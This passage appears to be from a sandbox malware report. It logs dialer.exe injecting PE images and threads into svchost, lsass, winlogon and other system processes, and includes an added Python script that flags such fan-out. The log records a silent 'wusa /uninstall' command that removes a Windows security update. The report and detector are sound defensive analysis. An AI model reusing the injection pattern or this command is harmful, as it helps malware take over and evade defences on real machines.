          Source: C:\Windows\System32\dialer.exe | Memory allocated: C:\Windows\System32\svchost.exe base: 1B924FB0000 protect: page execute and read and write
          Source: C:\Windows\System32\dialer.exe | Memory allocated: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exe base: 1570D1F0000 protect: page execute and read and write
          Source: C:\Windows\System32\dialer.exe | Memory allocated: C:\Windows\System32\svchost.exe base: 1879E9D0000 protect: page execute and read and write
          Source: C:\Windows\System32\dialer.exe | Memory allocated: C:\Windows\System32\svchost.exe base: 197DB9C0000 protect: page execute and read and write
          Source: C:\Windows\System32\dialer.exe | Memory allocated: C:\Windows\System32\svchost.exe base: 1DF6FFB0000 protect: page execute and read and write
          Source: C:\Windows\System32\dialer.exe | Memory allocated: C:\Windows\System32\svchost.exe base: 229F9BD0000 protect: page execute and read and write
          Source: C:\Windows\System32\dialer.exe | Memory allocated: C:\Windows\System32\svchost.exe base: 1392A290000 protect: page execute and read and write
          Source: C:\Windows\System32\dialer.exe | Memory allocated: C:\Windows\System32\sihost.exe base: 177AD190000 protect: page execute and read and write
          Source: C:\Windows\System32\dialer.exe | Memory allocated: C:\Windows\System32\svchost.exe base: 227FBAE0000 protect: page execute and read and write
          Source: C:\Windows\System32\dialer.exe | Memory allocated: C:\Windows\System32\svchost.exe base: 20620920000 protect: page execute and read and write
          Source: C:\Windows\System32\dialer.exe | Memory allocated: C:\Windows\System32\svchost.exe base: 27AAC950000 protect: page execute and read and write
          Source: C:\Windows\System32\dialer.exe | Memory allocated: C:\Windows\System32\svchost.exe base: 167425D0000 protect: page execute and read and write
          Source: C:\Windows\System32\dialer.exe | Memory allocated: C:\Windows\System32\svchost.exe base: 234F1060000 protect: page execute and read and write
          Source: C:\Windows\System32\dialer.exe | Memory allocated: C:\Windows\System32\ctfmon.exe base: 1A0BCB20000 protect: page execute and read and write
          Source: C:\Windows\System32\dialer.exe | Memory allocated: C:\Windows\System32\dasHost.exe base: 28092350000 protect: page execute and read and write
          Source: C:\Windows\System32\dialer.exe | Memory allocated: C:\Windows\System32\svchost.exe base: 1586A4D0000 protect: page execute and read and write
          Source: C:\Windows\System32\dialer.exe | Memory allocated: C:\Windows\System32\svchost.exe base: 2E523130000 protect: page execute and read and write
          Source: C:\Windows\System32\dialer.exe | Memory allocated: C:\Windows\explorer.exe base: 2530000 protect: page execute and read and write
          Source: C:\Windows\System32\dialer.exe | Memory allocated: C:\Windows\System32\svchost.exe base: 22D497A0000 protect: page execute and read and write
          Source: C:\Windows\System32\dialer.exe | Memory allocated: C:\Windows\System32\RuntimeBroker.exe base: 22AAA920000 protect: page execute and read and write
          Source: C:\Windows\System32\dialer.exe | Memory allocated: C:\Windows\System32\RuntimeBroker.exe base: 1FEFBE50000 protect: page execute and read and write
          Source: C:\Windows\System32\dialer.exe | Memory allocated: C:\Windows\System32\RuntimeBroker.exe base: 1F044E50000 protect: page execute and read and write
          Source: C:\Windows\System32\dialer.exe | Memory allocated: C:\Windows\System32\dllhost.exe base: 26AF0680000 protect: page execute and read and write
          Source: C:\Windows\System32\dialer.exe | Code function: 41_2_0000000140001C88 CreateProcessW,VirtualAllocEx,WriteProcessMemory,WriteProcessMemory,VirtualAlloc,GetThreadContext,WriteProcessMemory,SetThreadContext,ResumeThread,OpenProcess,TerminateProcess, 41_2_0000000140001C88
          Source: C:\Windows\System32\dialer.exe | Thread created: C:\Windows\System32\winlogon.exe EIP: F78F273C
          Source: C:\Windows\System32\dialer.exe | Thread created: C:\Windows\System32\lsass.exe EIP: 8E92273C
          Source: C:\Windows\System32\dialer.exe | Thread created: C:\Windows\System32\svchost.exe EIP: 36FA273C
          Source: C:\Windows\System32\dialer.exe | Thread created: unknown EIP: F796273C
          Source: C:\Windows\System32\dialer.exe | Thread created: unknown EIP: 8E98273C
          Source: C:\Windows\System32\dialer.exe | Thread created: unknown EIP: 3700273C
          Source: C:\Windows\System32\dialer.exe | Thread created: unknown EIP: 8AE7273C
          Source: C:\Windows\System32\dialer.exe | Thread created: C:\Windows\System32\svchost.exe EIP: 35FA273C
          Source: C:\Windows\System32\dialer.exe | Thread created: C:\Windows\System32\svchost.exe EIP: B939273C
          Source: C:\Windows\System32\dialer.exe | Thread created: C:\Windows\System32\svchost.exe EIP: 68CB273C
          Source: C:\Windows\System32\dialer.exe | Thread created: C:\Windows\System32\svchost.exe EIP: 68F3273C
          Source: C:\Windows\System32\dialer.exe | Thread created: C:\Windows\System32\svchost.exe EIP: C818273C
          Source: C:\Windows\System32\dialer.exe | Thread created: C:\Windows\System32\svchost.exe EIP: 50F4273C
          Source: C:\Windows\System32\dialer.exe | Thread created: C:\Windows\System32\svchost.exe EIP: 7D2C273C
          Source: C:\Windows\System32\dialer.exe | Thread created: C:\Windows\System32\svchost.exe EIP: 297D273C
          Source: C:\Windows\System32\dialer.exe | Thread created: C:\Windows\System32\svchost.exe EIP: 8379273C
          Source: C:\Windows\System32\dialer.exe | Thread created: C:\Windows\System32\svchost.exe EIP: 6419273C
          Source: C:\Windows\System32\dialer.exe | Thread created: C:\Windows\System32\svchost.exe EIP: 6D79273C
          Source: C:\Windows\System32\dialer.exe | Thread created: C:\Windows\System32\svchost.exe EIP: 551B273C
          Source: C:\Windows\System32\dialer.exe | Thread created: C:\Windows\System32\svchost.exe EIP: ACBC273C
          Source: C:\Windows\System32\dialer.exe | Thread created: C:\Windows\System32\svchost.exe EIP: C653273C
          Source: C:\Windows\System32\dialer.exe | Thread created: C:\Windows\System32\svchost.exe EIP: 39B8273C
          Source: C:\Windows\System32\dialer.exe | Thread created: C:\Windows\System32\svchost.exe EIP: 19273C
          Source: C:\Windows\System32\dialer.exe | Thread created: C:\Windows\System32\svchost.exe EIP: B578273C
          Source: C:\Windows\System32\dialer.exe | Thread created: C:\Windows\System32\svchost.exe EIP: C63D273C
          Source: C:\Windows\System32\dialer.exe | Thread created: C:\Windows\System32\svchost.exe EIP: 28C6273C
          Source: C:\Windows\System32\dialer.exe | Thread created: C:\Windows\System32\svchost.exe EIP: 2228273C
          Source: C:\Windows\System32\dialer.exe | Thread created: C:\Windows\System32\svchost.exe EIP: 24BB273C
          Source: C:\Windows\System32\dialer.exe | Thread created: C:\Windows\System32\svchost.exe EIP: 535B273C
          Source: C:\Windows\System32\dialer.exe | Thread created: C:\Windows\System32\svchost.exe EIP: E273273C
          Source: C:\Windows\System32\dialer.exe | Thread created: C:\Windows\System32\svchost.exe EIP: 122B273C
          Source: C:\Windows\System32\dialer.exe | Thread created: C:\Windows\System32\spoolsv.exe EIP: 7A273C
          Source: C:\Windows\System32\dialer.exe | Thread created: C:\Windows\System32\svchost.exe EIP: E1BC273C
          Source: C:\Windows\System32\dialer.exe | Thread created: C:\Windows\System32\svchost.exe EIP: FEB7273C
          Source: C:\Windows\System32\dialer.exe | Thread created: C:\Windows\System32\svchost.exe EIP: 3C7273C
          Source: C:\Windows\System32\dialer.exe | Thread created: C:\Windows\System32\svchost.exe EIP: D290273C
          Source: C:\Windows\System32\dialer.exe | Thread created: C:\Windows\System32\svchost.exe EIP: 2EB9273C
          Source: C:\Windows\System32\dialer.exe | Thread created: C:\Windows\System32\svchost.exe EIP: 80D6273C
          Source: C:\Windows\System32\dialer.exe | Thread created: C:\Windows\System32\svchost.exe EIP: 7B46273C
          Source: C:\Windows\System32\dialer.exe | Thread created: C:\Windows\System32\svchost.exe EIP: D0D9273C
          Source: C:\Windows\System32\dialer.exe | Thread created: C:\Windows\System32\svchost.exe EIP: 24FB273C
          Source: C:\Windows\System32\dialer.exe | Thread created: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exe EIP: D1F273C
          Source: C:\Windows\System32\dialer.exe | Thread created: C:\Windows\System32\svchost.exe EIP: 9E9D273C
          Source: C:\Windows\System32\dialer.exe | Thread created: C:\Windows\System32\svchost.exe EIP: DB9C273C
          Source: C:\Windows\System32\dialer.exe | Thread created: C:\Windows\System32\svchost.exe EIP: 6FFB273C
          Source: C:\Windows\System32\dialer.exe | Thread created: C:\Windows\System32\svchost.exe EIP: F9BD273C
          Source: C:\Windows\System32\dialer.exe | Thread created: C:\Windows\System32\svchost.exe EIP: 2A29273C
          Source: C:\Windows\System32\dialer.exe | Thread created: C:\Windows\System32\sihost.exe EIP: AD19273C
          Source: C:\Windows\System32\dialer.exe | Thread created: C:\Windows\System32\svchost.exe EIP: FBAE273C
          Source: C:\Windows\System32\dialer.exe | Thread created: C:\Windows\System32\svchost.exe EIP: 2092273C
          Source: C:\Windows\System32\dialer.exe | Thread created: C:\Windows\System32\svchost.exe EIP: AC95273C
          Source: C:\Windows\System32\dialer.exe | Thread created: C:\Windows\System32\svchost.exe EIP: 425D273C
          Source: C:\Windows\System32\dialer.exe | Thread created: C:\Windows\System32\svchost.exe EIP: F106273C
          Source: C:\Windows\System32\dialer.exe | Thread created: C:\Windows\System32\ctfmon.exe EIP: BCB2273C
          Source: C:\Windows\System32\dialer.exe | Thread created: C:\Windows\System32\dasHost.exe EIP: 9235273C
          Source: C:\Windows\System32\dialer.exe | Thread created: C:\Windows\System32\svchost.exe EIP: 6A4D273C
          Source: C:\Windows\System32\dialer.exe | Thread created: C:\Windows\System32\svchost.exe EIP: 2313273C
          Source: C:\Windows\System32\dialer.exe | Thread created: C:\Windows\explorer.exe EIP: 253273C
          Source: C:\Windows\System32\dialer.exe | Thread created: C:\Windows\System32\svchost.exe EIP: 497A273C
          Source: C:\Windows\System32\dialer.exe | Thread created: C:\Windows\System32\RuntimeBroker.exe EIP: AA92273C
          Source: C:\Windows\System32\dialer.exe | Thread created: C:\Windows\System32\RuntimeBroker.exe EIP: FBE5273C
          Source: C:\Windows\System32\dialer.exe | Thread created: C:\Windows\System32\RuntimeBroker.exe EIP: 44E5273C
          Source: C:\Windows\System32\dialer.exe | Memory written: C:\Windows\System32\winlogon.exe base: 1C8F78F0000 value starts with: 4D5A
          Source: C:\Windows\System32\dialer.exe | Memory written: C:\Windows\System32\lsass.exe base: 1BA8E920000 value starts with: 4D5A
          Source: C:\Windows\System32\dialer.exe | Memory written: C:\Windows\System32\svchost.exe base: 12E36FA0000 value starts with: 4D5A
          Source: C:\Windows\System32\dialer.exe | Memory written: C:\Windows\System32\dwm.exe base: 28F8AE40000 value starts with: 4D5A
          Source: C:\Windows\System32\dialer.exe | Memory written: C:\Windows\System32\winlogon.exe base: 1C8F7960000 value starts with: 4D5A
          Source: C:\Windows\System32\dialer.exe | Memory written: C:\Windows\System32\lsass.exe base: 1BA8E980000 value starts with: 4D5A
          Source: C:\Windows\System32\dialer.exe | Memory written: C:\Windows\System32\svchost.exe base: 12E37000000 value starts with: 4D5A
          Source: C:\Windows\System32\dialer.exe | Memory written: C:\Windows\System32\dwm.exe base: 28F8AE70000 value starts with: 4D5A
          Source: C:\Windows\System32\dialer.exe | Memory written: C:\Windows\System32\svchost.exe base: 22C35FA0000 value starts with: 4D5A
          Source: C:\Windows\System32\dialer.exe | Memory written: C:\Windows\System32\svchost.exe base: 1B3B9390000 value starts with: 4D5A
          Source: C:\Windows\System32\dialer.exe | Memory written: C:\Windows\System32\svchost.exe base: 23368CB0000 value starts with: 4D5A
          Source: C:\Windows\System32\dialer.exe | Memory written: C:\Windows\System32\svchost.exe base: 28B68F30000 value starts with: 4D5A
          Source: C:\Windows\System32\dialer.exe | Memory written: C:\Windows\System32\svchost.exe base: 29BC8180000 value starts with: 4D5A
          Source: C:\Windows\System32\dialer.exe | Memory written: C:\Windows\System32\svchost.exe base: 29D50F40000 value starts with: 4D5A
          Source: C:\Windows\System32\dialer.exe | Memory written: C:\Windows\System32\svchost.exe base: 2AB7D2C0000 value starts with: 4D5A
          Source: C:\Windows\System32\dialer.exe | Memory written: C:\Windows\System32\svchost.exe base: 1E9297D0000 value starts with: 4D5A
          Source: C:\Windows\System32\dialer.exe | Memory written: C:\Windows\System32\svchost.exe base: 1A183790000 value starts with: 4D5A
          Source: C:\Windows\System32\dialer.exe | Memory written: C:\Windows\System32\svchost.exe base: 1D564190000 value starts with: 4D5A
          Source: C:\Windows\System32\dialer.exe | Memory written: C:\Windows\System32\svchost.exe base: 1CF6D790000 value starts with: 4D5A
          Source: C:\Windows\System32\dialer.exe | Memory written: C:\Windows\System32\svchost.exe base: 1C2551B0000 value starts with: 4D5A
          Source: C:\Windows\System32\dialer.exe | Memory written: C:\Windows\System32\svchost.exe base: 171ACBC0000 value starts with: 4D5A
          Source: C:\Windows\System32\dialer.exe | Memory written: C:\Windows\System32\svchost.exe base: 283C6530000 value starts with: 4D5A
          Source: C:\Windows\System32\dialer.exe | Memory written: C:\Windows\System32\svchost.exe base: 1FF39B80000 value starts with: 4D5A
          Source: C:\Windows\System32\dialer.exe | Memory written: C:\Windows\System32\svchost.exe base: 1D500190000 value starts with: 4D5A
          Source: C:\Windows\System32\dialer.exe | Memory written: C:\Windows\System32\svchost.exe base: 257B5780000 value starts with: 4D5A
          Source: C:\Windows\System32\dialer.exe | Memory written: C:\Windows\System32\svchost.exe base: 1EAC63D0000 value starts with: 4D5A
          Source: C:\Windows\System32\dialer.exe | Memory written: C:\Windows\System32\svchost.exe base: 20428C60000 value starts with: 4D5A
          Source: C:\Windows\System32\dialer.exe | Memory written: C:\Windows\System32\svchost.exe base: 15222280000 value starts with: 4D5A
          Source: C:\Windows\System32\dialer.exe | Memory written: C:\Windows\System32\svchost.exe base: 16D24BB0000 value starts with: 4D5A
          Source: C:\Windows\System32\dialer.exe | Memory written: C:\Windows\System32\svchost.exe base: 163535B0000 value starts with: 4D5A
          Source: C:\Windows\System32\dialer.exe | Memory written: C:\Windows\System32\svchost.exe base: 14DE2730000 value starts with: 4D5A
          Source: C:\Windows\System32\dialer.exe | Memory written: C:\Windows\System32\svchost.exe base: 1B3122B0000 value starts with: 4D5A
          Source: C:\Windows\System32\dialer.exe | Memory written: C:\Windows\System32\spoolsv.exe base: 7A0000 value starts with: 4D5A
          Source: C:\Windows\System32\dialer.exe | Memory written: C:\Windows\System32\svchost.exe base: 184E1BC0000 value starts with: 4D5A
          Source: C:\Windows\System32\dialer.exe | Memory written: C:\Windows\System32\svchost.exe base: 211FEB70000 value starts with: 4D5A
          Source: C:\Windows\System32\dialer.exe | Memory written: C:\Windows\System32\svchost.exe base: 28F03C70000 value starts with: 4D5A
          Source: C:\Windows\System32\dialer.exe | Memory written: C:\Windows\System32\svchost.exe base: 1F3D2900000 value starts with: 4D5A
          Source: C:\Windows\System32\dialer.exe | Memory written: C:\Windows\System32\svchost.exe base: 1F22EB90000 value starts with: 4D5A
          Source: C:\Windows\System32\dialer.exe | Memory written: C:\Windows\System32\svchost.exe base: 17780D60000 value starts with: 4D5A
          Source: C:\Windows\System32\dialer.exe | Memory written: C:\Windows\System32\svchost.exe base: 1647B460000 value starts with: 4D5A
          Source: C:\Windows\System32\dialer.exe | Memory written: C:\Windows\System32\svchost.exe base: 224D0D90000 value starts with: 4D5A
          Source: C:\Windows\System32\dialer.exe | Memory written: C:\Windows\System32\svchost.exe base: 1B924FB0000 value starts with: 4D5A
          Source: C:\Windows\System32\dialer.exe | Memory written: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exe base: 1570D1F0000 value starts with: 4D5A
          Source: C:\Windows\System32\dialer.exe | Memory written: C:\Windows\System32\svchost.exe base: 1879E9D0000 value starts with: 4D5A
          Source: C:\Windows\System32\dialer.exe | Memory written: C:\Windows\System32\svchost.exe base: 197DB9C0000 value starts with: 4D5A
          Source: C:\Windows\System32\dialer.exe | Memory written: C:\Windows\System32\svchost.exe base: 1DF6FFB0000 value starts with: 4D5A
          Source: C:\Windows\System32\dialer.exe | Memory written: C:\Windows\System32\svchost.exe base: 229F9BD0000 value starts with: 4D5A
          Source: C:\Windows\System32\dialer.exe | Memory written: C:\Windows\System32\svchost.exe base: 1392A290000 value starts with: 4D5A
          Source: C:\Windows\System32\dialer.exe | Memory written: C:\Windows\System32\sihost.exe base: 177AD190000 value starts with: 4D5A
          Source: C:\Windows\System32\dialer.exe | Memory written: C:\Windows\System32\svchost.exe base: 227FBAE0000 value starts with: 4D5A
          Source: C:\Windows\System32\dialer.exe | Memory written: C:\Windows\System32\svchost.exe base: 20620920000 value starts with: 4D5A
          Source: C:\Windows\System32\dialer.exe | Memory written: C:\Windows\System32\svchost.exe base: 27AAC950000 value starts with: 4D5A
          Source: C:\Windows\System32\dialer.exe | Memory written: C:\Windows\System32\svchost.exe base: 167425D0000 value starts with: 4D5A
          Source: C:\Windows\System32\dialer.exe | Memory written: C:\Windows\System32\svchost.exe base: 234F1060000 value starts with: 4D5A
          Source: C:\Windows\System32\dialer.exe | Memory written: C:\Windows\System32\ctfmon.exe base: 1A0BCB20000 value starts with: 4D5A
          Source: C:\Windows\System32\dialer.exe | Memory written: C:\Windows\System32\dasHost.exe base: 28092350000 value starts with: 4D5A
          Source: C:\Windows\System32\dialer.exe | Memory written: C:\Windows\System32\svchost.exe base: 1586A4D0000 value starts with: 4D5A
          Source: C:\Windows\System32\dialer.exe | Memory written: C:\Windows\System32\svchost.exe base: 2E523130000 value starts with: 4D5A
          Source: C:\Windows\System32\dialer.exe | Memory written: C:\Windows\explorer.exe base: 2530000 value starts with: 4D5A
          Source: C:\Windows\System32\dialer.exe | Memory written: C:\Windows\System32\svchost.exe base: 22D497A0000 value starts with: 4D5A
          Source: C:\Windows\System32\dialer.exe | Memory written: C:\Windows\System32\RuntimeBroker.exe base: 22AAA920000 value starts with: 4D5A
          Source: C:\Windows\System32\dialer.exe | Memory written: C:\Windows\System32\RuntimeBroker.exe base: 1FEFBE50000 value starts with: 4D5A
          Source: C:\Windows\System32\dialer.exe | Memory written: C:\Windows\System32\RuntimeBroker.exe base: 1F044E50000 value starts with: 4D5A
          Source: C:\Windows\System32\dialer.exe | Memory written: C:\Windows\System32\dllhost.exe base: 26AF0680000 value starts with: 4D5A
          Source: C:\Windows\System32\dialer.exe | Memory written: PID: 4380 base: 2530000 value: 4D
          Source: C:\Users\user\AppData\Local\Temp\Temp1_MDE_File_Sample_c7859a067082aa31648a9b8f2abd982c504dd0af.zip\Setup.exe | Thread register set: target process: 7144
          Source: C:\ProgramData\guqotihtvufx\jnxsifnrdetl.exe | Thread register set: target process: 7112
          Source: C:\ProgramData\guqotihtvufx\jnxsifnrdetl.exe | Thread register set: target process: 7120
          Source: C:\ProgramData\guqotihtvufx\jnxsifnrdetl.exe | Thread register set: target process: 6444
          Source: C:\Windows\System32\dialer.exe | Memory written: C:\Windows\System32\winlogon.exe base: 1C8F78F0000
          Source: C:\Windows\System32\dialer.exe | Memory written: C:\Windows\System32\lsass.exe base: 1BA8E920000
          Source: C:\Windows\System32\dialer.exe | Memory written: C:\Windows\System32\svchost.exe base: 12E36FA0000
          Source: C:\Windows\System32\dialer.exe | Memory written: C:\Windows\System32\dwm.exe base: 28F8AE40000
          Source: C:\Windows\System32\lsass.exe | Memory written: C:\Windows\System32\dwm.exe base: 28F8ADF0000
          Source: C:\Windows\System32\dialer.exe | Memory written: C:\Windows\System32\winlogon.exe base: 1C8F7960000
          Source: C:\Windows\System32\dialer.exe | Memory written: C:\Windows\System32\lsass.exe base: 1BA8E980000
          Source: C:\Windows\System32\dialer.exe | Memory written: C:\Windows\System32\svchost.exe base: 12E37000000
          Source: C:\Windows\System32\dialer.exe | Memory written: C:\Windows\System32\dwm.exe base: 28F8AE70000
          Source: C:\Windows\System32\dialer.exe | Memory written: C:\Windows\System32\svchost.exe base: 22C35FA0000
          Source: C:\Windows\System32\dialer.exe | Memory written: C:\Windows\System32\svchost.exe base: 1B3B9390000
          Source: C:\Windows\System32\dialer.exe | Memory written: C:\Windows\System32\svchost.exe base: 23368CB0000
          Source: C:\Windows\System32\dialer.exe | Memory written: C:\Windows\System32\svchost.exe base: 28B68F30000
          Source: C:\Windows\System32\dialer.exe | Memory written: C:\Windows\System32\svchost.exe base: 29BC8180000
          Source: C:\Windows\System32\dialer.exe | Memory written: C:\Windows\System32\svchost.exe base: 29D50F40000
          Source: C:\Windows\System32\dialer.exe | Memory written: C:\Windows\System32\svchost.exe base: 2AB7D2C0000
          Source: C:\Windows\System32\dialer.exe | Memory written: C:\Windows\System32\svchost.exe base: 1E9297D0000
          Source: C:\Windows\System32\dialer.exe | Memory written: C:\Windows\System32\svchost.exe base: 1A183790000
          Source: C:\Windows\System32\dialer.exe | Memory written: C:\Windows\System32\svchost.exe base: 1D564190000
          Source: C:\Windows\System32\dialer.exe | Memory written: C:\Windows\System32\svchost.exe base: 1CF6D790000
          Source: C:\Windows\System32\dialer.exe | Memory written: C:\Windows\System32\svchost.exe base: 1C2551B0000
          Source: C:\Windows\System32\dialer.exe | Memory written: C:\Windows\System32\svchost.exe base: 171ACBC0000
          Source: C:\Windows\System32\dialer.exe | Memory written: C:\Windows\System32\svchost.exe base: 283C6530000
          Source: C:\Windows\System32\dialer.exe | Memory written: C:\Windows\System32\svchost.exe base: 1FF39B80000
          Source: C:\Windows\System32\dialer.exe | Memory written: C:\Windows\System32\svchost.exe base: 1D500190000
          Source: C:\Windows\System32\dialer.exe | Memory written: C:\Windows\System32\svchost.exe base: 257B5780000
          Source: C:\Windows\System32\dialer.exe | Memory written: C:\Windows\System32\svchost.exe base: 1EAC63D0000
          Source: C:\Windows\System32\dialer.exe | Memory written: C:\Windows\System32\svchost.exe base: 20428C60000
          Source: C:\Windows\System32\dialer.exe | Memory written: C:\Windows\System32\svchost.exe base: 15222280000
          Source: C:\Windows\System32\dialer.exe | Memory written: C:\Windows\System32\svchost.exe base: 16D24BB0000
          Source: C:\Windows\System32\dialer.exe | Memory written: C:\Windows\System32\svchost.exe base: 163535B0000
          Source: C:\Windows\System32\dialer.exe | Memory written: C:\Windows\System32\svchost.exe base: 14DE2730000
          Source: C:\Windows\System32\dialer.exe | Memory written: C:\Windows\System32\svchost.exe base: 1B3122B0000
          Source: C:\Windows\System32\dialer.exe | Memory written: C:\Windows\System32\spoolsv.exe base: 7A0000
          Source: C:\Windows\System32\dialer.exe | Memory written: C:\Windows\System32\svchost.exe base: 184E1BC0000
          Source: C:\Windows\System32\dialer.exe | Memory written: C:\Windows\System32\svchost.exe base: 211FEB70000
          Source: C:\Windows\System32\dialer.exe | Memory written: C:\Windows\System32\svchost.exe base: 28F03C70000
          Source: C:\Windows\System32\dialer.exe | Memory written: C:\Windows\System32\svchost.exe base: 1F3D2900000
          Source: C:\Windows\System32\dialer.exe | Memory written: C:\Windows\System32\svchost.exe base: 1F22EB90000
          Source: C:\Windows\System32\dialer.exe | Memory written: C:\Windows\System32\svchost.exe base: 17780D60000
          Source: C:\Windows\System32\dialer.exe | Memory written: C:\Windows\System32\svchost.exe base: 1647B460000
          Source: C:\Windows\System32\dialer.exe | Memory written: C:\Windows\System32\svchost.exe base: 224D0D90000
          Source: C:\Windows\System32\dialer.exe | Memory written: C:\Windows\System32\svchost.exe base: 1B924FB0000
          Source: C:\Windows\System32\dialer.exe | Memory written: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exe base: 1570D1F0000
          Source: C:\Windows\System32\dialer.exe | Memory written: C:\Windows\System32\svchost.exe base: 1879E9D0000
          Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 197DB9C0000
          Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 1DF6FFB0000
          Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 229F9BD0000
          Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 1392A290000
          Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\sihost.exe base: 177AD190000
          Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 227FBAE0000
          Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 20620920000
          Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 27AAC950000
          Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 167425D0000
          Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 234F1060000
          Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\ctfmon.exe base: 1A0BCB20000
          Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\dasHost.exe base: 28092350000
          Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 1586A4D0000
          Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 2E523130000
          Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\explorer.exe base: 2530000
          Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 22D497A0000
          Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: 22AAA920000
          Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: 1FEFBE50000
          Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: 1F044E50000
          Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\dllhost.exe base: 26AF0680000
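The entries above show a single source, dialer.exe, writing into dozens of svchost.exe instances and into spoolsv.exe, OfficeClickToRun.exe, sihost.exe, ctfmon.exe, dasHost.exe, explorer.exe, RuntimeBroker.exe and dllhost.exe. No single one of those writes is conclusive; the fan-out across unrelated system images is what separates an injector from a debugger or a one-off hooking library. The script below is an added example, not Joe Sandbox code: it parses report lines of this shape (the `|` separator is optional, so the run-together extracted form also parses) and scores every source by how many distinct system images and target instances it wrote into. The sample lines, the SYSTEM_TARGETS set and the thresholds are constructed assumptions for the example.

```python
r"""Flag a process that writes into the memory of many other processes.

Added example for this report, not Joe Sandbox code. Parses lines of the form
"Source: <path> | Memory written: <target path> base: <hex>" and scores each
source by fan-out. SYSTEM_TARGETS, the sample lines and the thresholds are
assumptions made for the example.
"""
import re
from collections import defaultdict

# The source and target groups stop at the first ".exe", so the line still parses
# when the source path and the "Memory written:" label run together.
MEMWRITE_RE = re.compile(
    r"Source:\s*(?P<src>.+?\.exe)\s*\|?\s*Memory written:\s*"
    r"(?P<dst>.+?\.exe)\s+base:\s*(?P<base>[0-9A-Fa-f]+)",
    re.IGNORECASE,
)

# Images a user-mode program has no business writing into (assumed list).
SYSTEM_TARGETS = {
    "svchost.exe", "spoolsv.exe", "explorer.exe", "winlogon.exe", "lsass.exe",
    "sihost.exe", "ctfmon.exe", "dashost.exe", "runtimebroker.exe", "dllhost.exe",
}

# Constructed sample mirroring the report's entries: one injector fanning out
# across system processes and one single write between a vendor's own binaries.
SAMPLE_LINES = r"""
Source: C:\Windows\System32\dialer.exe | Memory written: C:\Windows\System32\svchost.exe base: 22C35FA0000
Source: C:\Windows\System32\dialer.exe | Memory written: C:\Windows\System32\svchost.exe base: 1B3B9390000
Source: C:\Windows\System32\dialer.exe | Memory written: C:\Windows\System32\spoolsv.exe base: 7A0000
Source: C:\Windows\System32\dialer.exe | Memory written: C:\Windows\explorer.exe base: 2530000
Source: C:\Windows\System32\dialer.exe | Memory written: C:\Windows\System32\RuntimeBroker.exe base: 22AAA920000
Source: C:\Windows\System32\dialer.exe | Memory written: C:\Windows\System32\dllhost.exe base: 26AF0680000
Source: C:\Program Files\Vendor\updater.exe | Memory written: C:\Program Files\Vendor\helper.exe base: 7FF600000000
"""


def image_name(path):
    """Lower-case file name of a Windows path."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def parse_lines(text):
    """Return (source, target, base) triples for every 'Memory written' line."""
    records = []
    for line in text.splitlines():
        m = MEMWRITE_RE.search(line)
        if m:
            records.append((m.group("src"), m.group("dst"), m.group("base").upper()))
    return records


def flag_injectors(records, min_system_images=3, min_instances=10):
    """Report sources that hit several distinct system images, or many distinct
    target instances of any image. Thresholds are assumptions; tune per estate."""
    per_src = defaultdict(lambda: {"images": set(), "instances": set()})
    for src, dst, base in records:
        per_src[src]["images"].add(image_name(dst))
        per_src[src]["instances"].add((dst.lower(), base))
    flagged = []
    for src, seen in per_src.items():
        system_hits = seen["images"] & SYSTEM_TARGETS
        if len(system_hits) >= min_system_images or len(seen["instances"]) >= min_instances:
            flagged.append({
                "source": src,
                "distinct_images": len(seen["images"]),
                "system_images": sorted(system_hits),
                "instances": len(seen["instances"]),
            })
    # Widest fan-out first: that is the entry to look at.
    flagged.sort(key=lambda f: (f["distinct_images"], f["instances"]), reverse=True)
    return flagged


if __name__ == "__main__":
    for hit in flag_injectors(parse_lines(SAMPLE_LINES)):
        print(hit)
```

An EDR agent or an accessibility tool that loads its own DLL into every process will score just as high, so treat the output as a triage queue keyed on the source image (here a copy of the system dialer, a process with no reason to touch any of these targets) rather than as a verdict.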
          Source: C:\Users\user\AppData\Local\Temp\Temp1_MDE_File_Sample_c7859a067082aa31648a9b8f2abd982c504dd0af.zip\Setup.exe | Process created: C:\Windows\System32\dialer.exe C:\Windows\system32\dialer.exe
          Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\wusa.exe wusa /uninstall /kb:890830 /quiet /norestart
          Source: C:\ProgramData\guqotihtvufx\jnxsifnrdetl.exe | Process created: C:\Windows\System32\dialer.exe C:\Windows\system32\dialer.exe
          Source: C:\ProgramData\guqotihtvufx\jnxsifnrdetl.exe | Process created: C:\Windows\System32\dialer.exe C:\Windows\system32\dialer.exe
          Source: C:\ProgramData\guqotihtvufx\jnxsifnrdetl.exe | Process created: C:\Windows\System32\dialer.exe dialer.exe
          Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\wusa.exe wusa /uninstall /kb:890830 /quiet /norestart
